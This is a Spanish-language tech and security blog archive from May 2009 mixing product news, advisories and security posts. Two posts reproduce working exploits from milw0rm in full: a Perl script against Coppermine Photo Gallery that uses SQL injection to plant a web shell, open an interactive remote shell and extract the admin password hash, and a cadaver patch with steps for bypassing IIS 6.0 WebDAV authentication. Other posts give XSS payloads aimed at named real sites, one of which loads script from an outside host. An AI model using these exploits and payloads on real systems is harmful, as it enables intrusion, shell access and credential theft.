sábado, 30 de mayo de 2009

0 day en Microsoft DirectX

Microsoft ha reconocido en un aviso oficial una vulnerabilidad en DirectX sobre 2000, XP y 2003 que podría permitir a un atacante ejecutar código arbitrario. El fallo parece que se está aprovechando en estos momentos por atacantes, por lo que se convierte en un 0 day. Es explotable a través de archivos de QuickTime.

DirectX es una colección de APIs creadas para facilitar tareas relacionadas con la programación de juegos y multimedia en Windows. El kit de desarrollo de DirectX (SDK) y el EndUser Runtime se distribuyen gratuitamente por Microsoft y también adjunto a muchos programas que lo utilizan.

DirectX 7.x, 8.x y 9.x sobre Windows 2000, XP y 2003 sufre de una vulnerabilidad en la forma en la que DirectShow (en quartz.dll) maneja el formato QuickTime. Si la víctima abre un archivo QuickTime especialmente manipulado a través de cualquier vía (también a través el navegador), el atacante podría ejecutar código arbitrario con los permisos del usuario que ejecuta la aplicación.

Se recomienda tomar cualquiera de estas acciones:

a) Deshabilitar la interpretación de contenido QuickTime en quartz.dll borrando la rama HKEY_CLASSES_ROOT\CLSID\{D51BD5A0-7548-11CF-A520-0080C77EF58A} del registro.

b) Modificar la ACL de quartz.dll eliminando los permisos NTFS

c) Desregistrando la librería (Regsvr32.exe /u %WINDIR%\system32\quartz.dll)

Más Información:

Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/971778.mspx

Via hispasec

jueves, 28 de mayo de 2009

Lenovo saca al mercado la primer netbook con HD Video

Modelo: lenovo ideapad s12
Lenovo presenta la netbook capaz de reproducir HD video

Con su procesador Intel Atom N270 y el poderoso chip gráfico de Nvidia, esta netbook resalta entre las demás debido a su capacidad de reproducir videos HD.

Pantalla de 12 ", salida HDMI, teclado similar al de los equipos comunes.

El precio del nuevo netbook de Lenovo es, en su versión básica, de 449 dólares y 499 con HDMI y tarjeta Nvidia 9400.

Aquí en Mexico probablemente lleguen estos equipos en Julio o finales de Agosto, pero ya podemos ver como esas maquinitas van enriqueciendo sus funciones.

Consultar precios de laptops lenovo

Re: Formulario de Contacto (Aviso de XSS en Chili.com.mx)

Asunto: Re: Formulario de Contacto
Remitente: contacto
Destinatario: soporte@topmetroflog.site40.net
Fecha: 30.04.2009 14:05



Para proteger su privacidad, las imágenes externas han sido bloqueadas en este mensaje Mostrar imágenes
webmaster@chili.com.mx escribió:
Nombre: Soporte
EMAIL: soporte@topmetroflog.site40.net
Comentario: validen correctamente la busqueda porque es vulnerable a un ataque tipo xss.
Referer: http://www.chili.com.mx/search.php?q=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&_b=Buscar



Gracias por el aviso, pense que por tener mod_security configurado con
muchas reglas estaba cubierto, pero se ve que no. Voy a ver como lo
arreglo.

--
*----------------------------*
* Gerardo Perosio *
* contacto en chili *
* contacto@chili.com.mx *
*----------------------------*

Hay que validar correctamente la entrada de la variable q del archivo search.php que mediante GET recibe los parámetros de búsqueda, una solución parcial para search.php?q= podría ser
- Utilizar datos de codificación para evitar la inyección directa de caracteres potencialmente maliciosos (por ejemplo, véase la función htmlspecialchars [inglés] en PHP);
O hacer una función de validación propia.

Saludos,

miércoles, 27 de mayo de 2009

Windows Vista SP2 (Service Pack 2)


Actualización para el Sistema Operativo de Windows Vista (Service Pack 2)

Windows Vista Service Pack 2 (SP2) es el segundo pack de actualizaciones y mejoras para Windows Vista.


Windows Vista Service Pack 2 (SP2) incluye todas las actualizaciones de seguridad y correcciones que han ido saliendo hasta la fecha compiladas en un único instalable e incorpora de igual modo una serie de nuevas características.


Entre las mejoras de Windows Vista Service Pack 2 (SP2) se cuenta la compatibilidad con Bluetooth 2.1, la capacidad de grabación de discos Blu-ray, una mejor gestión de las conexiones WiFi o la última versión de Windows Search.
Una de las mejoras más interesantes pero menos conocidas del Windows Vista Service Pack 2 (SP2) es que elimina el límite conexiones TCP/IP semi-abiertas, presente en todas las versiones anteriores.

Sistema operativo: Windows Vista
Requisitos mínimos: - Windows Vista SP1

SP2 para Vista 32 bits (348 MB)
SP2 para Vista 64 bits (577 MB)







Grave fallo de seguridad en Soulseek


Se ha encontrado un problema de ejecución de código arbitrario en Soulseek que podría permitir a un atacante atacar a cualquier usuario conectado a la red. Se trata de una de las primeras vulnerabilidades graves y hechas públicas de este programa.

Soulseek es un programa de intercambio de ficheros a través de redes de pares. Fue fundado por un antiguo programador de Napster en 2000. Está especializado en intercambio de música, y entre sus virtudes está la gran cantidad de material de todo tipo accesible desde la red. Soulseek tomó el relevo de Audiogalaxy (sin duda el programa de intercambio con mayor cantidad y calidad de música).

Soulseek permite buscar ficheros de forma distribuida entre una persona, toda la comunidad que usa la aplicación, o en un canal IRC del programa. Así el usuario puede acotar su búsqueda de diferentes formas. El fallo es grave, puesto que permitiría que un atacante remoto realizase una supuesta búsqueda entre lo que comparte un usuario o incluso todo un canal IRC y ejecutar código en ellos. Todo usuario de Soulseek conectado resulta en una potencial víctima.

El fallo, encontrado por Laurent Gaffié se trata de un error de límites a la hora de procesar mensajes de búsqueda. Esto provoca un desbordamiento de memoria intermedia si se envía una cadena de búsqueda que contenga un parámetro demasiado largo. Se han hecho públicos todos los detalles de la vulnerabilidad y una prueba de concepto.

Soulseek no ha publicado parche. Se recomienda limitar el número de caracteres reservados a la búsqueda.

Soulseek * P2P Remote Distributed Search Code Execution
http://archives.neohapsis.com/archives/fulldisclosure/2009-05/0210.html

Coppermine Photo Gallery <= 1.4.22 Remote Exploit

#!/usr/bin/perl
# Coppermine Photo Gallery <= 1.4.22 Remote Exploit # Need register_globals = on and magic_quotes_gpc = off # Based on vulnerabilities discussed at http://www.milw0rm.org/exploits/8713 # Coded by girex use LWP::UserAgent; if(not defined $ARGV[0]) { banner(); print "[-] Usage: perl $0 [host] [path]\n"; print "[-] Example: perl $0 localhost /gallery/\n\n"; exit; } my $lwp = new LWP::UserAgent or die; my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; $target .= $ARGV[1] unless not defined $ARGV[1]; $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/; my $uid = '1'; # Change if need my @chars = ('1'..'9', 'a'..'f'); my $injection = '';

banner();
$lwp->default_header('Accept-Language: en-us,en;q=0.5');

my $html = inj_request(' WHERE x'); # Wrong query to obtain an error

if(not defined $html)
{
print "[-] Request mistake. Exploit terminated!\n";
exit ();
}
elsif($html =~ /There was an error while processing a database query/)
{
print "[+] Site vulnerable. Trying to retrieve absolute path...\n";
}
else
{
print "[-] Site not vulnerable to SQL Injection in thumbnails.php\n";
print "[-] Maybe magic_quotes = On or register_globals = Off\n";
end_try();
}

# This LFI includes README.txt that contais php code with phpinfo() function.
my $res = $lwp->get("${target}index.php?GLOBALS[USER][ID]=5b83a5f92603efcdb65d47c9a2991d6b&GLOBALS[USER][lang]=../README.txt");

if($res->content =~ /_SERVER\[\"SCRIPT_FILENAME\"\]<\/td>(.*)index\.php<\/td><\/tr>/)
{
$path_to = $1;
}
else
{
print "[-] Unable to retrieve the absolute path. Problems with LFI.\n";
end_try();
}

$html = inj_request("AND 1=2 UNION ALL SELECT '${injection}' INTO OUTFILE '${path_to}logs/log_db.inc.php");
my $res = $lwp->get($target.'logs/log_db.inc.php');

if($res->is_success)
{
print "[+] Shell injected at ${path_to}logs/log_db.inc.php\n\n";
}
else
{
print "[-] Shell upload failed, MySQL cannot write to logs path!\n\n";
print "[+] Attempting to retrieve admin's md5..\n";
blind_sql();

if(length($hash) != 32)
{
print "\n\n[-] Exploit mistake: unable to retrieve admin's md5\n";
}
else
{
print "\n";
}

end_try();
}

while(1)
{
print "[+] coppermine\@shell:~\$ ";
chomp(my $cmd = );

end_try() if $cmd eq 'exit';

$lwp->default_header( 'CMD' => $cmd );
my $res = $lwp->get($target.'logs/log_db.inc.php');

if($res->is_success and $res->content =~ /12345/)
{
print "\n". substr($res->content, index($res->content, '12345') + 5)."\n";
}
else
{
print "[-] Something wrong, command execution failed!\n";
last;
}
}




sub inj_request
{
my $sql = shift;
my $res = $lwp->get($target. "thumbnails.php?lang=english&album=alpha&GLOBALS[cat]=999'+${sql}");

if($res->is_success)
{
return $res->content;
}

return undef;
}

sub blind_sql
{
our $hash = '';
my $prefix = get_prefix() or 'cpg14x';
my $username = get_username() or 'admin';

$| = 1;
print "[+] username: ${username} - md5 hash: ";

for($i = 1; $i <= 32; $i++) { foreach $char(@chars) { $html = inj_request("OR+SUBSTRING((SELECT+user_password+FROM+${prefix}_users+WHERE+user_id=${uid}),${i},1)='${char}'%23"); if($html =~ /The selected album\/file does not exist/) { $hash .= $char; syswrite(STDOUT, $char, 1); last; } } last if $i != length($hash); } } sub get_prefix # File update.php shows the query executed to update the tables, we can get table prefix from it { my $rv = undef; my $res = $lwp->get($target.'update.php');

if($res->is_success and $res->content =~ /CREATE TABLE IF NOT EXISTS (\w+)_sessions/)
{
$rv = $1;
}

return $rv;
}

sub get_username
{
my $rv = undef;
my $res = $lwp->get($target."profile.php?lang=english&uid=${uid}");

if($res->content =~ /(.*)'s profile<\/td>/)
{
$rv = $1;
}

return $rv;
}

sub end_try
{
my $res = $lwp->get($target.'register.php?lang=english');

if($res->is_success and $res->content !~ /You don't have permission to access this page/)
{
print "\n[+] Target can be vulnerable to SQL Injection for registered users\n";
print "[+] See http://www.milw0rm.org/exploits/8713 to know how to exploit it!\n\n";
}
else
{
print "\n[-] The target is NOT vulnerable to the SQL Injection for registered users\n\n";
}

exit;
}

sub banner
{
print "\n[+] Coppermine Photo Gallery <= 1.4.22 Remote Exploit\n";
print "[+] Coded by girex\n";
print "\n";
}

# milw0rm.com [2009-05-19]

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)

# Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# --snip--
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# --snip--
# > tar xzvf cadaver-0.23.2.tar.gz
# --snip--
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch # patching file lib/neon/ne_basic.c # patching file lib/neon/ne_request.c # patching file lib/neon/ne_uri.c # > ./configure
# --snip--
# > make
# --snip--
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/': succeeded.
# password.txt 7 May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt':
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
--- cadaver-0.23.2/lib/neon/ne_basic.c 2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c 2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
value = "infinity";
break;
}
- ne_add_request_header(req, "Depth", value);
+ ne_add_request_header(req, "Depth", "1");
}

static int copy_or_move(ne_session *sess, int is_move, int overwrite,
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
--- cadaver-0.23.2/lib/neon/ne_request.c 2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c 2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
"Connection: TE" EOL
"TE: trailers" EOL);
}
+ ne_buffer_czappend(req->headers, "Translate: f" EOL);
}

int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
const char *method, const char *path)
{
+ char *path2 = ne_calloc(strlen(path)+7);
ne_request *req = ne_calloc(sizeof *req);

req->session = sess;
@@ -435,13 +437,18 @@
req->method = ne_strdup(method);
req->method_is_head = (strcmp(method, "HEAD") == 0);

+ if(strlen(path)>2)
+ sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+ else
+ path2 = path;
+
/* Only use an absoluteURI here when absolutely necessary: some
* servers can't parse them. */
- if (req->session->use_proxy && !req->session->use_ssl && path[0] == '/')
+ if (req->session->use_proxy && !req->session->use_ssl && path2[0] == '/')
req->uri = ne_concat(req->session->scheme, "://",
- req->session->server.hostport, path, NULL);
+ req->session->server.hostport, path2, NULL);
else
- req->uri = ne_strdup(path);
+ req->uri = ne_strdup(path2);

{
struct hook *hk;
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
--- cadaver-0.23.2/lib/neon/ne_uri.c 2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c 2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX x0 x2 x4 x6 x8 xA xC xE */
/* 0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/* 1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/* 2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/* 2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/* 3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/* 4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/* 5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,

# milw0rm.com [2009-05-21]



domingo, 24 de mayo de 2009

Ataque Man-in-the-middle


En respuesta a Ricardo Dos Santos,
"Muchas gracias por colaboración, Ingeniero. Hay alguna bibliografía que me pueda recomendar para poder sustentar el argumento de que conociendo la PSK y utilizando un sniffer se pueden desencriptar los paquetes? El trabajo que estoy realizando es para un banco, y lo estamos haciendo bajo la óptica de "empleado descontento con acceso a la clave pre-compartida", de manera de poder justificar la obligatoriedad de un cambio de clave cada vez que salga un empleado de la nómina.
De nuevo, muchas gracias por su colaboración."

En criptografía, un ataque man-in-the-middle (MitM o intermediario, en castellano) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. El ataque MitM es particularmente significativo en el protocolo original de intercambio de claves de Diffie-Hellman, cuando éste se emplea sin autenticación.

La necesidad de una transferencia adicional por un canal seguro

Salvo el Interlock Protocol, todos los sistemas criptográficos seguros frente a ataques MitM requieren un intercambio adicional de datos o la transmisión de cierta información a través de algún tipo de canal seguro. En ese sentido, se han desarrollado muchos métodos de negociación de claves con diferentes exigencias de seguridad respecto al canal seguro.

Posibles subataques

El ataque MitM puede incluir algunos de los siguientes subataques:

* Intercepción de la comunicación (eavesdropping), incluyendo análisis del tráfico y posiblemente un ataque a partir de textos planos (plaintext) conocidos.
* Ataques a partir de textos cifrados escogidos, en función de lo que el receptor haga con el mensaje descifrado.
* Ataques de sustitución.
* Ataques de repetición.
* Ataque por denegación de servicio (denial of service). El atacante podría, por ejemplo, bloquear las comunicaciones antes de atacar una de las partes. La defensa en ese caso pasa por el envío de periódico de mensajes de status autenticados.

MitM se emplea típicamente para referirse a manipulaciones activas de los mensajes, más que para denotar intercepción pasiva de la comunicación.

Un ejemplo de criptografía de clave pública

Supóngase que Alice desea comunicarse con Bob, y Mallory quiere interceptar esa conversación, o quizá hacer llegar un mensaje falso a Bob. Para inciar la comunicación, Alice debe solicitar a Bob su clave pública. Si Bob envía su clave a Alice, pero Mallory es capaz de interceptarla, ésta podría desplegar un ataque MitM. Mallory podría enviar a Alice su propia clave pública (de Mallory, en lugar de la de Bob). Alice, creyendo que la clave pública recibida es de Bob, cifraría su mensaje con la clave de Mallory y enviaría el criptograma a Bob. Mallory interceptaría de nuevo, descifraría el mensaje con su clave privada, guardaría una copia; volvería a cifrar el mensaje con la clave de Bob (tras una alteración, si así lo deseara) y lo re-enviaría a Bob. Cuando éste lo recibiera, creería que proviene de Alice.

Este ejemplo ilustra la necesidad de Alice y Bob de contar con alguna garantía de que están usando efectivamente las claves públicas correctas. En otro caso, sus comunicaciones se verían expuestas a ataques de este tipo usando la tecnología de clave pública. Afortunadamente, existe una variedad de técnicas que ayudan a defenderse de los ataques MitM.

Defensas contra el ataque

La posibilidad de un ataque de intermediario sigue siendo un problema potencial de seguridad serio, incluso para muchos criptosistemas basados en clave pública. Existen varios tipos de defensa contra estos ataques MitM que emplean técnicas de autenticación basadas en:

* Claves públicas
* Autenticación mutua fuerte
* Claves secretas (secretos con alta entropía)
* Passwords (secretos con baja entropía)
* Otros criterios, como el reconocimiento de voz u otras características biométricas

La integridad de las claves públicas debe asegurarse de alguna manera, pero éstas no exigen ser secretas, mientras que los passwords y las claves de secreto compartido tienen el requerimiento adicional de la confidencialidad. Las claves públicas pueden ser verificadas por una autoridad de certificación (CA), cuya clave pública sea distribuida a través de un canal seguro (por ejemplo, a través del explorador de Web o en la instalación del sistema operativo).

http://es.wikipedia.org/wiki/Ataque_Man-in-the-middle

En el ataque anterior, se muestra cñaramente que una vez autenticado en la red se puede actar como intermediario entre dos elementos de la misma red sin que alguno de ellos se de cuenta y se puede obtener mucha información, es cuestion de analizar correctamente los paquetes que viajan y utilizar los mecanismos de desencriptación apropiados.

Un trabajo fácil cuando los paquetes viajan sin encriptación como en el caso de consultas http, MSNMS u otros; si se utilizan protocolos de comunicación más seguros, el trabajo del man in the middle es un poco más complicado, pero todo se puede.

http://www.securityfocus.com/brief/910
Man-in-the-middle attack sidesteps SSL

http://www.contentverification.com/man-in-the-middle/index.html
Man In The Middle Attack

http://en.wikipedia.org/wiki/Man-in-the-middle_attack
Man-in-the-middle attack

http://www.bujarra.com/ProcedimientoManInTheMiddle.html
Man In The Middle con Ettercap

http://icaix.com/front/2007/02/02/arp-poisoning-main-in-the-middle-attack-vol-1/
Videotutorial de tres partes de cómo hacer un MitM por ARP Poissoning.

Ahora que el man in the middle es uno de las formas de ataque, pero hay muchisimas formas de ataque una vez estando dentro de la misma red.

martes, 19 de mayo de 2009

Robot para equipo de rescate

El sexting y sus consecuencias

Hola, esta vez viendo las noticias me encontré con una noticia donde se comenta lo que comúnmente hacen gran parte de los jóvenes con sus celulares, envian y reciben fotos al más propio estilo porno, pero tengan cuidado de las consecuencias que eso implica.




No lo produzcas. Si te sacas una fotografía erótica y se la envías a alguien mediante un móvil o Internet, pierdes inmediatamente el control sobre dónde podrá acabar algún día. Y si se la sacas a alguien, asegúrate de tener su permiso y de las implicaciones que podría tener perderla o que te la robasen. Y, por supuesto, tener permiso para sacar una foto a alguien para uso privado ¡no significa que tengas permiso para difundirla!

No lo retrasmitas. Si te llega una foto o vídeo de algún/a conocido/a, no colabores en su expansión pues podría tener consecuencias graves tanto para él/ella como para ti.

No lo provoques. No le solicites a nadie ese tipo de fotografías puesto que aunque tú no tengas malas intenciones, alguna tercera persona podría hacerse con ellas y haceros mal a ti o a tu novio/a.

Estos son algunos consejos que debes tomar en cuenta antes de enviar una de esas fotos por el mms, e-mail, subirlas al flog o cualquier web de internet.

Actualmente el sexting es muy popular entre los adolescentes, pero constituye un delito cuando se trata de menores de edad.

En cuanto subes material a Internet lo pones a manos de cualquiera, por seguridad evitate problemas.

domingo, 17 de mayo de 2009

Hoy se celebra el día Mundial de Internet


El día de Internet es una efeméride que se celebra el 17 de mayo, impulsada por la Asociación de Usuarios de Internet. Se celebró por primera vez el 25 de octubre de 2005. Poco tiempo después, la Cumbre de la Sociedad de la Información celebrada en Túnez en noviembre de 2005, decidió proponer a la ONU la designación del 17 de mayo como el Día Mundial de la Sociedad de la Información,[1] por lo que se movió el denominado Día de Internet a dicha fecha.

Objetivos

Pretende dar a conocer las posibilidades que ofrecen las nuevas tecnologías para mejorar el nivel de vida de los pueblos y de sus ciudadanos.

La idea

La iniciativa del Día de Internet surgió por iniciativa de la Asociación de Usuarios de Internet, a la que se sumaron diferentes asociaciones españolas que veían con interés el compartir en una fecha lo que cada uno hace para acercar la Sociedad de la Información (SI) a todos los ciudadanos.

En latinoamérica la iniciativa del Día Mundial de Internet también tuvo gran acogida, es así que hoy se encuentran vinculadas la Asociación Colombiana de Usuarios de Internet, la Asociación Méxicana de Internet, la Asociación Argentina de Usuarios de Internet, la Asociación Chilena de Usuarios de Internet y en Ecuador el capítulo de ISOC en ese país.

En Colombia la Asociación Colombiana de Usuarios de Internet tiene como misión institucional promover la socialización, conocimiento, uso y aprovechamiento de las Tecnologías de Información y Comunicaciones y en particular de Internet en el país.

La celebración del día de Internet en su primera edición tuvo lugar el 25 de octubre de 2005. En esa fecha, se llevaron a cabo más de 400 eventos en más de 8.000 emplazamientos de 31 provincias de las 17 Comunidades Autónomas. Más de 200 entidades públicas y privadas suscribieron la Declaración de Principios para construir la Sociedad de la Información, en representación de más de un millón de ciudadanos.

En noviembre de 2005, la II Cumbre Mundial de la Sociedad de la Información celebrada en Túnez, aprobó proponer a la Asamblea General de Naciones Unidas la designación del 17 de mayo como Día Mundial de las Telecomunicaciones y de la Sociedad de la Información.

En el artículo 121 del documento de conclusiones de la Cumbre Mundial de la Sociedad de la Información, celebrada en Túnez en Noviembre de 2005, se afirma que:
Es necesario contribuir a que se conozca mejor Internet para que se convierta en un recurso mundial verdaderamente accesible al público. Hacemos un llamamiento para que la AGNU declare el 17 de mayo Día Mundial de la Sociedad de la Información, que se celebrará anualmente y servirá para dar a conocer mejor la importancia que tiene este recurso mundial en las cuestiones que se tratan en la Cumbre, en especial, las posibilidades que puede ofrecer el uso de las TIC a las sociedades y economías, y las diferentes formas de colmar la brecha digital.

El Día de Internet aporta una oportunidad para impulsar y favorecer el acceso a la Sociedad de la Información de los no conectados y de los discapacitados. Además, aprovechando la experiencia adquirida en España, se va a fomentar la celebración del Día de Internet en otros países, poniendo a disposición de aquellos que estén interesados todo el trabajo, información y metodología desarrollado por los que han participado en ediciones anteriores.

Quien hace el dia de internet

La organización del día de Internet se apoya en cuatro pilares fundamentales: una Asociación de Usuarios de Internet como Oficina Técnica que coordina y planifica; un Comité de Impulso donde se integran los agentes sociales más relevantes (Administraciones, asociaciones, federaciones, universidades, colegios, sindicatos, partidos políticos...); los Promotores, que desarrollan eventos y actividades con motivo del Día de Internet; y, finalmente, los Comunicadores que contribuyen a su difusión. Todos comparten un espacio en la Sociedad de la Información, lo que permite tener una idea global del proyecto y, al mismo tiempo, una visión personalizada en función de criterios diferentes.

Participacion

Todo el mundo está invitado a participar en el Día de Internet. Hay diversas formas de participar y contribuir. En muchas ciudades se realizan eventos que conmemoran dicho día, organizados por empresas, administraciones y organizaciones de cualquier tipo y tamaño, que deben cumplir las siguientes condiciones:

* Que acerque la Sociedad de la Información a los no conectados o discapacitados.
* Que su realización principal suceda el 17 de mayo.
* Que se dé a conocer en www.diadeinternet.org.

También se llevan a cabo declaraciones a las que se puede suscribir como persona física o colectivo y se hace entrega de los premios del diadeinternet, cuya finalidad es reconocer el esfuerzo de personas e instituciones para incorporar a los ciudadanos a la Sociedad de la Información, fomentar la accesibilidad en la red, estimular la participación abierta de personas e instituciones y contribuir a la difusión de la efeméride.

Antecedentes

Esta celebración tiene su primer antecedente en la celebración del Día Mundial de las Telecomunicaciones una efeméride centrada en esta profesión y sus profesionales, posteriormente en la década de los 90 en Estados Unidos celebraron el “Internet Day” con el objetivo concreto de dedicar una jornada festiva a cablear las escuelas y dejo de celebrarse en el momento en que se solucionó este problema.

A mediados de los años 90 surge en Francia La fête de l’internet, acontecimiento que se sigue celebrando anualmente a mediados de Marzo de cada año y centrado en los países francofonos.

La Unión Europea instauró en el año 2004 el Safer Internet Day con el objetivo de dar a conocer como hacer una Internet más segura y confiable. Esta acción soportada por varios países de la UE repitió su realización en el año 2005.

La iniciativa del Día de Internet surge, en España, en el año 2004, a partir de una propuesta de la Asociación de Usuarios de Internet, a la que se suman diferentes organizaciones, teniendo su primera celebración del Día de Internet de 2005 el 25 de octubre de este año con notable éxito de participación.

Tras la declaración de Túnez, la organización del diadeinternet ha fijado como fecha para su realización el 17 de mayo y va a contribuir dentro de sus posibilidades a que esta iniciativa se desarrolle en todos los países del mundo.

Financiación

La participación en el día del internet es totalmente gratuita y no exige el pago de ninguna contraprestación a los organizadores. Cada uno de los actores que participan en el diadeinternet tiene, como no puede ser de otra manera, total libertad para buscar los apoyos y las fuentes de financiación que consideren oportunas para desarrollar su actividad.

Todos los materiales desarrollados con motivo del dia del internet y con independencia de quien los desarrolle podrán ser utilizados de forma libre y gratuita siempre que contribuyan a difundir, impulsar y apoyar la iniciativa diadeinternet.

Los países que se incorporen y que utilicen un idioma distinto a los soportados en ese momento deben de asumir el compromiso de traducir la información estática y de navegación a su idioma (15.000 palabras aproximadamente).

Via http://www.diadeinternet.org/

Alerta de XSS en el sitio egoquiz.com


En el sitio egoquiz se ha encontrado una vulnerabilidad xss que podría comprometer la integridad de los datos del servidor mediante un simple ataque como este:

Ejemplo:
http://www.egoquiz.com/listoRestaurarListaNegra.php?email=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3C%2F%73%63%72%69%70%74%3E

Previsualización.

Recomendación:
Validar inmediatamente las entradas a la variable email de la pagina listoRestaurarListaNegra.php

Saludos

viernes, 15 de mayo de 2009

Donde obtener/bajar ubuntu gratis?


Hola a todos, a continuación les muestro los pasos para registrarse en el sitio oficial de la distribución ubuntu y obtenerla de forma gratuita.

1. Conectarse a la dirección http://www.ubuntu.com/

2. Entrar a la sección GET UBUNTU:

3. Elegir el medio preferido para obtener ubuntu:
---- a) Descargarlo ahora:
Descarga directamente una imagen de cd de Ubuntu, Kubuntu o Edubuntu a tu computadora- Toma en cuenta que la imagen del disco puede pesar aproximadamente 700 MB.

---- b) Comprar un DC o DVD:
Puedes adquirir uno o más discos atraves de amazon, por una modica cantidad para cubrir el costo de reproducción y el envío.

---- c) Solicitar un CD Gratuito:
Solicita un disco de Ubuntu, Kubuntu o Edubuntu Canonicos de forma totalmente GRATUITA solo es necesario registrarse y esperar de 6 a 10 semanas a que el paquete llegue a tu domicilio.

4. Registrarse en ubuntu.com para realizar la transacción (no es necesario registrarse en caso de descarga directa).

5. En caso de ser descarga directa, es recomendable elegir la versión estable más reciente.

6. Elegir la ubicación del servidor para descargar la imagen del disco (la que gustes).

7. Seleccionar la arquitectura del equipo ya sea 32 o 64 bits.

8. Hacer clic en descargar.

Nos vemos

Microsoft desarrolla una cámara 3D para el Xbox 360


Microsoft está desarrollando una nueva cámara 3D con sensores de movimiento para el Xbox 360, lo que permitirá a los jugadores controlar los juegos de manera similar al Wii de Nintendo, pero sin un control o mando físico.

La cámara representa otro esfuerzo por parte de la industria de los videojuegos para llegar a los consumidores con nuevas formas de jugar y más intuitivas que los métodos tradicionales de controles y botones.

La cámara reconoce a los jugadores y los movimientos de sus manos, permitiendo interactuar con los juegos de está innovadora manera.


El nuevo dispositivo se presentará en la E3 en junio y se estima que estará a la venta en el año 2010. Si la cámara llega a funcionar bien será muy divertida de usar, y una nueva manera (sin cables ni controles) de jugar, algo bien estilo libre.


Via
HispaMp3

Crean una aplicación para distinguir textos copiados de internet

La empresa Symmetric ha desarrollado una aplicación que permite distinguir si un texto es original del autor, o si pertenece a alguna fuente en Internet.

En declaraciones a Europa Press, el responsable de Symmetric, José Luís Macho, explicó hoy que se trata de una aplicación ‘que examina textos en formato word o pdf y detecta si hay partes que han sido copiadas de fuentes como la wikipedia y en qué porcentaje’.

Saludos.

lunes, 11 de mayo de 2009

Pescado Robot - Video

Primer pescado robot con evasión de obstáculos y nado independiente, les tomó tres años desarrollarlo a unos estudiantes de la universidad de Essex Took.
Inspirado en la carpa y nada a la misma velocidad que la tuna.


Un dedo se convierte por accidente en memoria USB

Vean el caso de este joven que convirtió su dedo en memoria USB, ceo que vale la pena recordar "no intentes esto en casa".


domingo, 10 de mayo de 2009

Actualización de Google Chrome corrige dos vulnerabilidades


Google ha publicado una actualización de su navegador Google Chrome, para corregir dos vulnerabilidades que podrían llegar a permitir a un atacante remoto la ejecución de código arbitrario.

El primero de los problemas reside en un error de validación de entrada en el proceso del navegador. Un usuario remoto podría crear código HTML de forma que al ser cargado por el navegador provocaría un desbordamiento de búfer en InitSkBitmapFromData() y ejecutar código arbitrario en el sistema atacado.

El segundo de los problemas corregidos permitiría a un usuario remoto crear una imagen o un archivo canvas de forma específica para que al ser cargado por el navegador provoque un desbordamiento de búfer y la ejecución de código arbitrario dentro de la sandbox de Google Chrome.

Se recomienda comprobar que el navegador está actualizado a la última versión disponible.

Más Información:

Stable Update: Security Fix
http://googlechromereleases.blogspot.com/2009/05/stable-update-security-fix.html

Descarga la ultima version de Google Chrome.

viernes, 8 de mayo de 2009

WiGig, el WiFi que viene

Una alianza de gigantes tecnológicos dará lugar a un nuevo estándar WiFi que permitirá incluso la transmisión de video a alta definición (HD).

